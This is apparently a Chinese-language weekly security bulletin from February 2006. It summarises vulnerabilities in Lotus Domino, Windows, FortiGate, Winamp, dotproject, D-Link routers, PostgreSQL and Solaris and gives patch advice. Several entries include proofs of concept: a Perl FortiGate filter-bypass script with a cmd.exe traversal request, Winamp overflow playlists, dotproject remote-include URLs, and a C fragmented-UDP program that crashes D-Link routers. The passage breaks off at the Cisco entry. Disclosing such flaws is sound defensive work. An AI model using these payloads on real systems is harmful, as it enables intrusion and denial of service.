2006/02/09-06/02/17互联网安全公告

时间:2007-01-03 21:17:20 来源: 作者:whsong 点击:次出处:技术无忧

关键字：2006

一:系统漏洞

Linux Kernel NFS ACL访问控制绕过漏洞

IBM Lotus Domino iNotes客户端脚本注入漏洞

IBM Lotus Domino Server LDAP远程拒绝服务漏洞

IBM Lotus Notes文件附件处理多个远程溢出和目录遍历漏洞

Fortinet FortiGate URL检查过滤可绕过漏洞

Microsoft Windows Media Player插件缓冲区溢出漏洞（MS06-006）

Microsoft Windows畸形IGMPv3报文远程拒绝服务漏洞（MS06-007）

Microsoft Internet Explorer WMF图形解析内存破坏漏洞（MS06-004）

Microsoft Windows Media Player畸形位图文件处理堆溢出漏洞（MS06-005）

Microsoft Windows Web Client缓冲区溢出漏洞（MS06-008）

Microsoft PowerPoint 2000远程信息泄露漏洞（MS06-010）

Nullsoft Winamp畸形M3U文件拒绝服务漏洞

Dotproject多个远程文件包含漏洞

多个D-Link产品IP报文重组拒绝服务漏洞

PostgreSQL “SET SESSION AUTHORIZATION”命令拒绝服务漏洞

PostgreSQL远程SET ROLE命令权限提升漏洞

Sun Solaris in.rexecd守护程序本地权限提升漏洞

Cisco多个产品TACACS+访问认证绕过漏洞

二:安全信息

Fortinet FortiGate杀毒引擎绕过检测漏洞

Windows发现两处缺陷黑客可完全控制系统

微软本周二发布例行安全更新修复7个漏洞

爱立信针对运营商环境推移动反病毒解决方案

微软发布月度安全公告修复高危级WMF漏洞

盖茨归结安全问题急待解决四个方面

三:趋势安全周报

一周病毒情况报告

系统漏洞信息

系统安全技巧

一:系统漏洞
Linux Kernel NFS ACL访问控制绕过漏洞
发布日期：2006-02-09
更新日期：2006-02-09
受影响系统：
Linux kernel
BUGTRAQ ID: 16570
CVE(CAN) ID: CVE-2005-3623
Linux Kernel是开放源码操作系统Linux所使用的内核。
Linux Kernel的NFS实现上存在漏洞，远程攻击者可能绕过访问控制获取非授权访问。
Linux Kernel的NFS实现中在设置ACL之前没有验证远程用户的权限，允许攻击者在NFS文件系统上更改ACL，这样就可以绕过访问控制获得非授权访问。
建议：
厂商补丁：
Linux
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
* Linux linux-2.6.14.5.tar.bz2
http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.14.5.tar.bz2
IBM Lotus Domino iNotes客户端脚本注入漏洞
发布日期：2006-02-10
更新日期：2006-02-10
受影响系统：
IBM Lotus Domino Web Access 7.x
IBM Lotus Domino Web Access (iNotes) 6.x
IBM Lotus Domino 7.x
IBM Lotus Domino 6.x
不受影响系统：
IBM Lotus Domino 7.0.1
IBM Lotus Domino 6.5.5
描述：
BUGTRAQ ID: 16577
IBM Lotus Domino/Notes是一套得到广泛应用的群件系统，iNotes可提供基于WEB的消息系统。
Lotus Domino iNotes客户端中存在多个漏洞，可能允许恶意用户执行脚本注入攻击：
1) 如果用户点击了附件文件（如html文件）的话，就会在站点环境中打开该文件。这可能导致以用户会话的权限执行任意JavaScript代码。
2) 在以浏览器标题显示邮件标题之前没有进行正确的过滤，导致用户浏览邮件时以用户会话的权限执行任意JavaScript 。
3) 可以通过在URL中注入“ ”导致绕过“javascript:” URL相关的安全检查，以用户会话的权限执行任意JavaScript。
4) 在向用户显示附件文件名前没有进行正确的过滤，导致导致用户浏览邮件时以用户会话的权限执行任意JavaScript。
只有浏览器中没有安装Domino Web Access ActiveX控件的条件下才允许上述攻击。
测试方法：
警告
以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
alert("Vulnerable!");
Link
建议：
厂商补丁：
IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
http://www-1.ibm.com/support/docview.wss?rs=475&uid=swg21229919
IBM Lotus Domino Server LDAP远程拒绝服务漏洞
发布日期：2006-02-10
更新日期：2006-02-10
受影响系统：
IBM Lotus Notes/Domino 7.0.1
IBM Lotus Notes/Domino 6.5.5
IBM Lotus Notes/Domino 6.5.4 FP2
描述：
CVE(CAN) ID: CVE-2005-2712
IBM Lotus Domino Server软件可在各种操作系统上提供消息，日程安排等功能。
IBM Lotus Domino Server处理畸形请求时存在问题，远程攻击者可能利用此漏洞对服务器进行拒绝服务攻击。
IBM Lotus Domino Server的LDAP server “nldap.exe”中存在拒绝服务漏洞。如果远程攻击者向LDAP服务端口（389）发送了特制请求的话，就会触发空指针引用问题，导致进程崩溃。
建议：
临时解决方法：
* 使用防火墙限制对LDAP server的TCP 389端口的访问。
厂商补丁：
IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21229907
IBM Lotus Notes文件附件处理多个远程溢出和目录遍历漏洞
发布日期：2006-02-10
更新日期：2006-02-10
受影响系统：
IBM Lotus Notes 7.0
IBM Lotus Notes 6.5.4
不受影响系统：
IBM Lotus Notes 7.0.1
IBM Lotus Notes 6.5.5
描述：
BUGTRAQ ID: 16576
CVE(CAN) ID: CAN-2005-2618,CAN-2005-2619
Lotus Domino/Notes服务器是一款基于WEB协同工作的应用程序架构，运行在Linux/Unix和Microsoft Windows操作系统平台下。
IBM Lotus Notes中存在多个远程溢出和目录遍历漏洞，具体如下：
IBM Lotus Notes的kvarcve.dll在解压ZIP文档创建压缩文件的完整路径名时存在栈溢出漏洞，如果用户在
Notes附件浏览器中解压了带有超长文件名的压缩文件时可能导致执行任意代码。
IBM Lotus Notes的uudrdr.dll在处理带有超长文件名的特制UUE文件时存在堆溢出漏洞，如果用户在Notes附件浏览器中打开了恶意的UUE文件的话就可能导致执行任意代码。
IBM Lotus Notes的TAR阅读器（tarrdr.dll）在从TAR文档解压文件时存在栈溢出漏洞。如果用户解压了带有超长文件名的TAR文件的话就可能导致执行任意代码。但是，只有用户选择将恶意文件解压到有超长路径（多于220个字节）的目录中时才会出现这个漏洞。
IBM Lotus Notes的HTML快速阅读器（htmsr.dll）中存在栈溢出漏洞。如果用户读取了包含有以“http”、“ftp”或“//”开始的超长（大约800个字符）链接的恶意邮件的话，就可能导致执行任意代码。
IBM Lotus Notes的HTML阅读器在检查链接是否引用了本地文件时存在栈溢出漏洞。如果用户浏览了包含有超长链接的恶意邮件时就可能执行任意代码。
IBM Lotus Notes的kvarcve.dll在从ZIP、UUE或TAR文档生成压缩文件预览时存在目录遍历漏洞。如果用户在Notes附件浏览器中预览了恶意文件的话就可能导致删除任意文件。
建议：
厂商补丁：
IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载6.5.5或7.0.1版本：
http://www.ers.ibm.com/
Fortinet FortiGate URL检查过滤可绕过漏洞
发布日期：2006-02-13
更新日期：2006-02-13
受影响系统：
Fortinet FortiOS 3 beta
Fortinet FortiOS 2.8 MR10
描述：
BUGTRAQ ID: 16599
CVE(CAN) ID: CAN-2005-3058
Fortinet FortiGate是一款流行的硬件防火墙。
FortiGate处理HTTP请求的URL过滤时存在问题，远程攻击者可能利用漏洞绕过检查过滤。
如果HTTP请求的每行都以CR而不是CRLF结束的话，或如果HTTP/1.0请求中没有主机字段的话，Fortinet就会无法解析，导致恶意URL绕过Fortinet URL拦截器。
测试方法：
警告
以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
# http_req.pl
#
# Made by (Mathieu Dessus)
#
# Make a filter for /test* URL in the Fortigate and
# remove the # depending on which HTTP request you want to test
use IO::Socket;
$target = '1.2.3.4';
# Detected
$data = "GET /test HTTP/1.1/r
Host: $target/r
Pragma: no-cache/r
Accept: */*/r
/r
";
# Not detected
$data = "GET /test2 HTTP/1.1
Host: $target
Pragma: no-cache
Accept: */*
";
# Not detected
$data = "GET /test3 HTTP/1.0/r/n/r/n";
# Detected
#$data = "GET /test4 HTTP/1.0/r/nHost: $target/r/n/r/n";
# Detected :)
#$data = "GET //c/winnt/system32/cmd.exe?/c+dir HTTP/1.0/n/n";
my $sock = new IO::Socket::INET (
PeerAddr => $target,
PeerPort => '80',
Proto => 'tcp',
);
die "Could not create socket: $!/n" unless $sock;
print $sock $data;
read($sock, $ret, 600);
print($ret."/n");
close($sock);
建议：
厂商补丁：
Fortinet
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.fortinetfirewall.com/index.php
Microsoft Windows Media Player插件缓冲区溢出漏洞（MS06-006）
发布日期：2006-02-14
更新日期：2006-02-14
受影响系统：
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows 2000SP4
描述：
BUGTRAQ ID: 16644
CVE(CAN) ID: CVE-2006-0005
Microsoft Windows Media Player是一款非常流行的媒体播放器。Windows Media Player（WMP）可在流行的浏览器中作为插件启动以便用户浏览网页上的Windows Media Player文件类型。
Microsoft Windows Media Player插件实现上存在缓冲区溢出漏洞，在某些环境下，远程攻击者可能利用此漏洞在用户机器上执行任意指令。
一些非IE的浏览器（如FireFox和Netscape）中，Windows Media Player插件中的漏洞可以被触发，IE及Opera浏览器不受此漏洞影响。如果上述浏览器浏览嵌入了超长src标签的恶意HTML页面并启动WMP插件的话，可以覆盖SEH地址导致在系统中执行任意指令。
具体来说，漏洞存在于npdsplay.10001040，在这里用户提供的字符串被拷贝到了栈缓冲区中：
1000171A C1E9 02 SHR ECX,2
>> 1000171D F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
1000171F 8BC8 MOV ECX,EAX
建议：
临时解决方法：
NSFOCUS建议您采取如下措施以降低威胁：
* 在受影响的浏览器中修改媒体文档到WMP的映射关系
以Firefox为例：
选择工具->选项->下载->下载动作->查看、编辑动作，在对话框中修改所有默认用WMP打开的媒体文件类型。
厂商补丁：
Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS06-006）以及相应补丁:
MS06-006：Vulnerability in Windows Media Player Plug-in with Non-Microsoft Internet Browsers Could Allow Remote Code Execution (911564)
链接：http://www.microsoft.com/technet/security/Bulletin/MS06-006.mspx
Microsoft Windows畸形IGMPv3报文远程拒绝服务漏洞（MS06-007）
发布日期：2006-02-14
更新日期：2006-02-14
受影响系统：
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
描述：
BUGTRAQ ID: 16645
CVE(CAN) ID: CVE-2006-0021
Microsoft Windows是微软发布的非常流行的操作系统。
Microsoft Windows的TCP/IP协议栈在处理IGMPv3报文时存在问题，远程攻击者可以利用此漏洞对主机执行远程拒绝服务攻击。
Microsoft Windows在实现TCP/IP时没能正确的处理特制的IGMP报文，未经认证的远程攻击者可以通过向有漏洞系统发送特制的IGMP报文导致系统失去响应。
建议：
临时解决方法：
NSFOCUS建议您采取如下措施以降低威胁：
* 编辑注册表，修改IGMP协议的操作级别：
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip/Parameters
将IGMPLevel从2改成0。
IGMPLevel REG_DWORD 0 | 1 | 2 (2为默认值)
0 禁用IGMP协议支持
1 只发送IGMP报文
2 允许发送、接收IGMP报文
* IGMP并不是一种广为使用的协议，在防火墙或路由器阻断所有IGMP网络报文
厂商补丁：
Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS06-007）以及相应补丁:
MS06-007：Vulnerability in TCP/IP Could Allow Denial of Service (913446)
链接：http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx
Microsoft Internet Explorer WMF图形解析内存破坏漏洞（MS06-004）
发布日期：2006-01-09
更新日期：2006-02-14
受影响系统：
Microsoft Internet Explorer 5.0.1 SP4
- Microsoft Windows 2000 SP4
描述：
BUGTRAQ ID: 16516
CVE(CAN) ID: CVE-2006-0020
Microsoft Internet Explorer是一款非常流行的WEB浏览器。
Microsoft Internet Explorer在处理畸形的WMF文件时存在漏洞，攻击者可能利用此漏洞导致用户机器拒绝服务或执行任意指令。
Internet Explorer 5.01 SP4中所使用的Microsoft WMF解析应用程序存在内存破坏漏洞。攻击者可以创建带有畸形WMF头部大小的特制WMF文件，如果用户被诱使浏览了该文件的话就会触发整数溢出，导致拒绝服务或执行任意指令。
建议：
临时解决方法：
NSFOCUS建议您采取如下措施以降低威胁：
* 不接受任何不可信来源的WMF文件
厂商补丁：
Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS06-004）以及相应补丁:
MS06-004：Cumulative Security Update for Internet Explorer (910620)
链接：http://www.microsoft.com/technet/security/Bulletin/MS06-004.mspx
补丁下载：
http://www.microsoft.com/downloads/details.aspx?FamilyId=C0DF2FC3-2075-46B5-945F-6E0BD6806151
Microsoft Windows Media Player畸形位图文件处理堆溢出漏洞（MS06-005）
发布日期：2006-02-14
更新日期：2006-02-14
受影响系统：
Microsoft Windows Media Player 10.0
- Microsoft Windows XP SP2
- Microsoft Windows XP SP1
Microsoft Windows Media Player 7.1
- Microsoft Windows 2000 SP4
Microsoft Windows Media Player 9.0
- Microsoft Windows XP SP2
- Microsoft Windows XP SP1
- Microsoft Windows Server 2003
- Microsoft Windows 2000 SP4
Microsoft Windows Media Player for XP
- Microsoft Windows XP SP1
描述：
BUGTRAQ ID: 16633
CVE(CAN) ID: CVE-2006-0006
Microsoft Windows Media Player是一款非常流行的媒体播放器。
Microsoft Windows Media Player在处理畸形的位图文件时存在漏洞，攻击者可能利用此漏洞在用户机器上执行任意指令。
Windows Media Player可以播放位图格式文件（如.bmp文件）并解码bmp文件，但没有正确地处理声明大小为0的bmp文件。在这种情况下，WMP会分配大小为0的堆，但实际上会以实际文件长度拷贝数据到这个堆，因此声明大小为0的bmp文件会导致溢出。攻击者可以通过诱骗用户使用Windows Media Player打开特制的位图文件导致执行任意指令。
建议：
临时解决方法：
NSFOCUS建议您采取如下措施以降低威胁：
* 备份并删除WMZ注册表项
* 在DirectX "Filter Graph no thread"注册表项修改访问控制列表
* 备份并删除DirectX "Filter Graph no thread"注册表项
* 注销Quartz.dll
厂商补丁：
Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS06-005）以及相应补丁:
MS06-005：Vulnerability in Windows Media Player Could Allow Remote Code Execution (911565)
链接：http://www.microsoft.com/technet/security/Bulletin/MS06-005.mspx
补丁下载：
http://www.microsoft.com/downloads/details.aspx?FamilyId=26A0B9E1-1242-4E55-B3D4-8377B83257C6
http://www.microsoft.com/downloads/details.aspx?FamilyId=8F9EEF16-04F7-4DA8-A0EF-1797B52D0B4B
http://www.microsoft.com/downloads/details.aspx?FamilyId=182735E1-9382-4F2E-A624-D2316A96B411
Microsoft Windows Web Client缓冲区溢出漏洞（MS06-008）
发布日期：2006-02-14
更新日期：2006-02-14
受影响系统：
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
描述：
BUGTRAQ ID: 16636
CVE(CAN) ID: CVE-2006-0013
Microsoft Windows是微软发布的非常流行的操作系统。
Microsoft Windows的Web Client服务中存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞在主机上执行任意指令。
远程攻击者可以通过向有漏洞系统发送特制的WebDAV请求导致执行任意指令。但是，攻击者必须拥有有效的登录凭据才可以利用这个漏洞。
建议：
临时解决方法：
NSFOCUS建议您采取如下措施以降低威胁：
* 禁用Web Client服务
* 使用组策略设置在所有不需要这个功能的受影响系统上禁用WebClient服务
* 在防火墙阻断TCP 139和445端口
* 使用个人防火墙，如Windows XP和Windows Server 2003捆绑的Internet连接防火墙
* 在支持的系统上启用高级TCP/IP过滤功能
厂商补丁：
Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS06-008）以及相应补丁:
MS06-008：Vulnerability in Web Client Service Could Allow Remote Code Execution (911927)
链接：http://www.microsoft.com/technet/security/Bulletin/MS06-008.mspx
Microsoft PowerPoint 2000远程信息泄露漏洞（MS06-010）
发布日期：2006-02-14
更新日期：2006-02-14
受影响系统：
Microsoft PowerPoint 2000
描述：
BUGTRAQ ID: 16634
CVE(CAN) ID: CVE-2006-0004
Microsoft PowerPoint是一款流行的办公软件，主要用于演示演讲稿。
Microsoft PowerPoint 2000在同Internet Explorer交互时存在信息泄露漏洞，可能允许远程攻击者通过名称尝试访问临时Internet文件文件夹（TIFF）中的对象来获得敏感信息。
建议：
临时解决方法：
NSFOCUS建议您采取如下措施以降低威胁：
* 备份并删除vnd.ms-powerpoint MIME类型
* 配置Internet Explorer在适当的Office程序而不是Internet Explorer中打开Office文档
厂商补丁：
Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS06-010）以及相应补丁:
MS06-010：Vulnerability in PowerPoint 2000 Could Allow Information Disclosure (889167)
链接：http://www.microsoft.com/technet/security/Bulletin/MS06-010.mspx
补丁下载：
http://www.microsoft.com/downloads/details.aspx?familyid=E51B27C8-2F31-4E99-B868-CE626FED5B7D
Nullsoft Winamp畸形M3U文件拒绝服务漏洞
发布日期：2006-02-13
更新日期：2006-02-14
受影响系统：
Nullsoft Winamp 5.13
描述：
BUGTRAQ ID: 16623
Winamp是一款流行的媒体播放器，支持多种文件格式。
Winamp在处理有超长文件名的特制m3u文件时存在缓冲区溢出，攻击者可能导致用户机器上的Winamp进程拒绝服务。
此漏洞不同于编号为CVE-2005-3188的漏洞。
测试方法：
警告
以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
m3U文件格式示例：
#EXTM3U
#EXTINF:,VULN
[url=http://AAAA[...]AA.wma]http://AAAA[...]AA.wma[/url]
pls文件格式示例：
[playlist]
numberofentries=5
File1=http://AAAA[...]AA.wma
Title1=
Length5=-1
Version=2
修改A的数量直至出现溢出。
建议：
厂商补丁：
Nullsoft
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.winamp.com/
Dotproject多个远程文件包含漏洞
发布日期：2006-02-14
更新日期：2006-02-14
受影响系统：
dotproject dotproject
BUGTRAQ ID: 16648
dotproject是一个PHP+MySql编写的beta级基于web的项目管理和跟踪工具。
dotproject实现上存在多个输入验证漏洞，远程攻击者可能利用这些漏洞在系统上执行任意命令。
dotproject的protection.php脚本没有正确地验证siteurl参数中的用户输入，因此攻击者可以通过eval()包含远程PHP文件并执行任意PHP代码。
此外，还有一些路径泄露漏洞。如果使用baseDir=foobar参数直接访问的话，几乎所有/db/中的文件都可能出现一些可利用的php错误。如果没有删除/doc/目录的话（默认配置），就可以访问以下两个文件泄漏系统信息：
1) /docs/phpinfo.php - phpinfo()文件
2) /docs/check.php - 有关所安装的dotProject的信息
测试方法：
警告
以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
[url=http://www.example.com/includes/db_adodb.php?baseDir=[REMOTE]http://www.example.com/includes/db_adodb.php?baseDir=[REMOTE[/url] INCLUDE]
[url=http://www.example.com/includes/db_connect.php?baseDir=[REMOTE]http://www.example.com/includes/db_connect.php?baseDir=[REMOTE[/url] INCLUDE]
[url=http://www.example.com/includes/session.php?baseDir=[REMOTE]http://www.example.com/includes/session.php?baseDir=[REMOTE[/url] INCLUDE]
[url=http://www.example.com/modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE]http://www.example.com/modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE[/url] INCLUDE]
[url=http://www.example.com/modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE]http://www.example.com/modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE[/url] INCLUDE]
[url=http://www.example.com/modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE]http://www.example.com/modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE[/url] INCLUDE]
[url=http://www.example.com/modules/admin/vw_usr_roles.php?baseDir=[REMOTE]http://www.example.com/modules/admin/vw_usr_roles.php?baseDir=[REMOTE[/url] INCLUDE]
[url=http://www.example.com/modules/public/calendar.php?baseDir=[REMOTE]http://www.example.com/modules/public/calendar.php?baseDir=[REMOTE[/url] INCLUDE]
[url=http://www.example.com/modules/public/date_format.php?baseDir=[REMOTE]http://www.example.com/modules/public/date_format.php?baseDir=[REMOTE[/url] INCLUDE]
[url=http://www.example.com/modules/tasks/gantt.php?baseDir=[REMOTE]http://www.example.com/modules/tasks/gantt.php?baseDir=[REMOTE[/url] INCLUDE]
建议：
临时解决方法：
* 禁止register_globals，删除/docs/目录并用htaccess对/db/目录设置访问控制。
厂商补丁：
dotproject
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.dotproject.net/
多个D-Link产品IP报文重组拒绝服务漏洞
发布日期：2006-02-13
更新日期：2006-02-14
受影响系统：
D-Link Wireless Router DI-784
D-Link Wireless Router DI-624
D-Link Wireless Router DI-524
D-Link Ethernet Broadband Router
不受影响系统：
D-Link Wireless Router DI-614+
D-Link Ethernet Broadband Router DI-604
描述：
BUGTRAQ ID: 16621
D-Link是国际著名网络设备和解决方案提供商，产品包括多种路由器设备。
D-Link的多个无线接入路由器存在拒绝服务漏洞，远程攻击者可能利用此漏洞对设备进行拒绝服务攻击。
如果攻击者发送3个连续的如下碎片UDP报文的话就会导致设备重启：
所有报文的IP首部中必须有相同的Identification Number。
报文1:
必须将MORE_FRAGMENTS标记位设置为1（IP_MF）
碎片偏移＝0
报文的有效部分大小为8个字节。攻击代码中使用了空字节。
报文2:
将MORE_FRAGMENTS标记设置为1（0x2002）
碎片偏移＝16
有效部分8个字节长。
报文3:
将MORE_FRAGMENTS标记设置为0（0x0003）
碎片偏移＝24
有效部分8个字节长。
收到上述报文后受影响路由器会立即终止所有的当前连接。DI-524需要大约1分钟可以重启恢复连接，DI-624需要大约30秒可以重启。
测试方法：
警告
以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
/*
*
* Aaron Portnoy
*
* silc.thunkers.net, thunkers
*
* D-Link Wireless Access Point
* Fragmented UDP DoS Proof of Concept
*
*
* gcc -o dlink_dos dlink_dos.c -lnet -Wall
*
*/
#include
#define DEVICE "eth0"
#define SRC_IP "127.0.0.1"
#define DST_IP "127.0.0.1"
#define SRC_PRT 200
#define DST_PRT 11111
void usage (char *name)
{
fprintf (stderr,
"Usage: %s -s -d /
-a -b /n",
name);
exit (EXIT_FAILURE);
}
int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT,
u_short dPRT, int count)
{
libnet_t *l = NULL;
libnet_ptag_t udp = 0;
libnet_ptag_t ip = 0;
char errbuf[LIBNET_ERRBUF_SIZE];
char *payload = NULL;
u_short payload_s = 0, src_prt, dst_prt;
u_long src_ip, dst_ip;
int c, frag;
if (!device)
device = DEVICE;
l = libnet_init (LIBNET_RAW4, device, errbuf);
if (!l) {
fprintf (stderr, "libnet_init() failed: %s/n", errbuf);
exit (EXIT_FAILURE);
}
src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) :
libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE);
dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) :
libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE);
src_prt = sPRT ? sPRT : SRC_PRT;
dst_prt = dPRT ? dPRT : DST_PRT;
if (count == 1) {
payload = "/0/0/0/0/0/0/0/0";
payload_s = 8;
}
udp = libnet_build_udp (src_prt,
dst_prt,
(LIBNET_UDP_H + payload_s) * 2,
0, (unsigned char *)payload, payload_s, l, udp);
if (udp == -1) {
fprintf (stderr, "Can't build UDP header: %s/n", libnet_geterror (l));
exit (EXIT_FAILURE);
}
switch (count) {
case 1:
frag = IP_MF;
break;
case 2:
frag = 0x2002;
break;
case 3:
frag = 0x0003;
break;
}
ip = libnet_build_ipv4 (20,
0,
1800,
frag,
128,
IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip);
if (ip == -1) {
fprintf (stderr, "Can't build IP header: %s/n", libnet_geterror (l));
exit (EXIT_FAILURE);
}
c = libnet_write (l);
if (c == -1) {
fprintf (stderr, "Write error: %s/n", libnet_geterror (l));
exit (EXIT_FAILURE);
}
printf ("Wrote UDP packet; check the wire./n");
libnet_destroy (l);
return (EXIT_SUCCESS);
}
int main (int argc, char **argv)
{
int i;
char *pDST, *pSRC, *device;
u_short dPRT = 0;
u_short sPRT = 0;
pDST = pSRC = device = NULL;
while ((i = getopt (argc, argv, "D:d:s:a:b:h")) != EOF) {
switch (i) {
case 'D':
device = optarg;
break;
case 'd':
pDST = optarg;
break;
case 's':
pSRC = optarg;
break;
case 'a':
sPRT = atoi (optarg);
break;
case 'b':
dPRT = atoi (optarg);
break;
case 'h':
usage (argv[0]);
break;
}
}
printf ("/n----------------------------------/n");
printf (" -= D-Link DoS PoC =-/n");
printf (" Aaron Portnoy/n");
printf (" deft () thunkers ! net /n");
printf (" silc.thunkers.net, thunkers/n");
printf ("----------------------------------/n");
device ? printf ("/nDevice: /t%s/n", device) :
printf ("/nDevice: /t%s/n", DEVICE);
pSRC ? printf ("SRC IP: /t%s/n", pSRC) :
printf ("SRC IP: /t%s/n", SRC_IP);
pDST ? printf ("DST IP: /t%s/n", pDST) :
printf ("DST IP: /t%s/n", DST_IP);
sPRT ? printf ("SPort: /t/t%d/n", sPRT) :
printf ("SPort: /t/t%d/n", SRC_PRT);
dPRT ? printf ("DPort: /t/t%d/n/n", dPRT) :
printf ("DPort: /t/t%d/n/n", DST_PRT);
for (i = 1; i
return (EXIT_SUCCESS);
}
建议：
厂商补丁：
D-Link
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.dlink.com/
PostgreSQL “SET SESSION AUTHORIZATION”命令拒绝服务漏洞
发布日期：2006-02-14
更新日期：2006-02-15
受影响系统：
PostgreSQL PostgreSQL 8.0.0-8.0.6
PostgreSQL PostgreSQL 7.4.0-7.4.11
PostgreSQL PostgreSQL 7.3.0-7.3.13
不受影响系统：
PostgreSQL PostgreSQL 8.0.7
PostgreSQL PostgreSQL 7.4.12
PostgreSQL PostgreSQL 7.3.14
描述：
BUGTRAQ ID: 16650
CVE(CAN) ID: CVE-2006-0678
PostgreSQL是一款高级对象-关系型数据库管理系统，支持扩展的SQL标准子集。
PostgreSQL处理用户提交的特定命令时存在问题，远程攻击者可能利用此漏洞导致服务器产生拒绝服务。
如果启用了Assert的话，远程攻击者就可以向PostgreSQL发送有特制参数的SET SESSION AUTHORIZATIONE命令导致服务器拒绝服务。但是，这个漏洞无法导致权限提升，因为用户必须拥有超级用户权限才能使用SET SESSION AUTHORIZATION命令。
建议：
厂商补丁：
PostgreSQL
----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
* PostgreSQL postgresql-7.3.14.tar.bz2
http://wwwmaster.postgresql.org/download/mirrors-ftp?file=source%2Fv7.3.14%2Fpostgresql-7.3.14.tar.bz2
* PostgreSQL postgresql-7.4.12.tar.bz2
http://wwwmaster.postgresql.org/download/mirrors-ftp?file=source%2Fv7.4.12%2Fpostgresql-7.4.12.tar.bz2
* PostgreSQL postgresql-8.0.7.tar.bz2
http://wwwmaster.postgresql.org/download/mirrors-ftp?file=source%2Fv8.0.7%2Fpostgresql-8.0.7.tar.bz2
* PostgreSQL postgresql-8.1.3.tar.bz2
http://wwwmaster.postgresql.org/download/mirrors-ftp?file=source%2Fv8.1.3%2Fpostgresql-8.1.3.tar.bz2
PostgreSQL远程SET ROLE命令权限提升漏洞
发布日期：2006-02-15
更新日期：2006-02-15
受影响系统：
PostgreSQL PostgreSQL 8.1.2
PostgreSQL PostgreSQL 8.1.1
PostgreSQL PostgreSQL 8.1
不受影响系统：
PostgreSQL PostgreSQL 8.1.3
描述：
BUGTRAQ ID: 16649
CVE(CAN) ID: CVE-2006-0553
PostgreSQL是一款高级对象-关系型数据库管理系统，支持扩展的SQL标准子集。
PostgreSQL在处理特定的SET ROLE处理时存在漏洞，远程攻击者可能利用此漏洞控制服务器的操作系统。
远程攻击者可以向PostgreSQL发送有特制参数的SET ROLE命令导致任何登录到数据库的用户都可以获得其他数据库用户的权限，包括超级用户权限。这意味着任何用户都可以访问机器的文件系统并有可能控制服务器的操作系统。
建议：
厂商补丁：
PostgreSQL
----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
* PostgreSQL postgresql-8.1.3.tar.bz2
http://wwwmaster.postgresql.org/download/mirrors-ftp?file=source%2Fv8.1.3%2Fpostgresql-8.1.3.tar.bz2
Sun Solaris in.rexecd守护程序本地权限提升漏洞
发布日期：2006-02-15
更新日期：2006-02-15
受影响系统：
Sun Solaris 10_x86
Sun Solaris 10.0
不受影响系统：
Sun Solaris 9.0_x86
Sun Solaris 9.0
Sun Solaris 8.0_x86
Sun Solaris 8.0
描述：
BUGTRAQ ID: 16658
Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。
Solaris in.rexecd(1M)守护程序存在安全漏洞，本地非特权用户可以在Kerberos系统上以提升的权限执行任意命令。
建议：
临时解决方法：
使用svcadm(1M)命令禁用in.rexecd(1M)服务，如：
# svcadm disable svc:/network/rexec:default
厂商补丁：
Sun
---
Sun已经为此发布了一个安全公告（Sun-Alert-102186）以及相应补丁:
Sun-Alert-102186：Security Vulnerability in the in.rexecd(1M) Daemon on Kerberos Systems
链接：http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102186-1
补丁下载：
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-120330-02-1
Cisco多个产品TACACS+访问认证绕过漏洞
发布日期：2006-02-15
更新日期：2006-02-16
受影响系统：
Cisco Guard 5.0(3)
Cisco Guard 5.0(1)
Cisco Traffic Anomaly Detector 5.0(3)
Cisco Traffic Anomaly Detector 5.0(1)
不受影响系统：
Cisco Guard 5.1(4)
Cisco Traffic Anomaly Detector 5.1(4)
描述：
